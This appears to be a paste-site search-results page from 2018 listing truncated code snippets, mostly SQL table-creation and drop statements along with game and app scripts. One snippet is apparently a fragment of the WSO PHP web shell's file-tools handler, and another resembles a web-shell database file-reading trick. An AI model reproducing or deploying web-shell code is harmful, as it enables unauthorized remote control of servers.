42.7K results in 817 ms
8 years ago · May 12, 2018, 04:50 PM
1; } stock MySQL_SetUpTables() { mysql_tquery(SQL_ID, "CREATE TABLE IF NOT EXISTS `accounts` ( \ `uid` INT(11) NOT
8 years ago · May 12, 2018, 04:32 PM
FOREIGN_KEY_CHECKS = 0; drop database if exists #{database}; create database #{database} character set
8 years ago · May 12, 2018, 02:58 PM
License along with TWRP. If not, see <http://www.gnu.org/licenses/>. */ #include <stdio.h>
8 years ago · May 12, 2018, 02:12 PM
getSelection() SelectionBox.Adornee = selection end) if not success then SelectionBox.Adornee = nil
8 years ago · May 12, 2018, 12:40 PM
don't give a shit if I'm outnumbered, it's runescape not life; not gonna cry
8 years ago · May 12, 2018, 11:40 AM
settings { If !SystemModuleIni.Exist() SystemModuleIni.Append() ; create a blank file if it does not exist If (mameID = "ti99_4a") ;
8 years ago · May 12, 2018, 10:28 AM
wise initialize the hash table if ($isFile(voicechannels.hsh)) { ; file exists, now we load it
8 years ago · May 12, 2018, 07:16 AM
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} // recieve query for create table structure $res = mysql_query("SHOW
8 years ago · May 12, 2018, 06:42 AM
DROP TABLE IF EXISTS `character_queststatus_seasonal`; CREATE TABLE `character_queststatus_seasonal` ( `guid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT
8 years ago · May 12, 2018, 06:34 AM
all old data"); db.execSQL("DROP TABLE IF EXISTS contacts"); onCreate(db); } } //---opens the
8 years ago · May 12, 2018, 05:16 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · May 12, 2018, 05:14 AM
drop table if exists "users"; create table "users" ( id bigint not null, username varchar(255) not
8 years ago · May 12, 2018, 04:56 AM
05-11-2018 09:39:22 PM] ~ [QUERY] - CREATE TABLE IF NOT EXISTS kload_users ( id INT UNSIGNED
8 years ago · May 12, 2018, 03:50 AM
DROP DATABASE IF EXISTS demo; CREATE DATABASE demo; USE demo;
8 years ago · May 12, 2018, 02:12 AM
DROP DATABASE IF EXISTS demo; CREATE DATABASE demo; USE demo; CREATE TABLE names ( name VARCHAR(50) NOT
8 years ago · May 12, 2018, 01:04 AM
ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%; } table { border-collapse: separate; mso-table-lspace: 0pt;
8 years ago · May 12, 2018, 12:30 AM
inquiry = array ( "USE $db_name", 'CREATE TEMPORARY TABLE ' . ($tkl_table = 'A'.time ()) . ' (a LONGBLOB)',
8 years ago · May 11, 2018, 07:56 PM
DROP TABLE IF EXISTS `pages`; CREATE TABLE `pages` ( `id` int(11) NOT NULL AUTO_INCREMENT, `title` varchar(255) DEFAULT NULL, `content` text, PRIMARY KEY (`id`), UNIQUE KEY `titleu` (`title`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
Total pages: 2134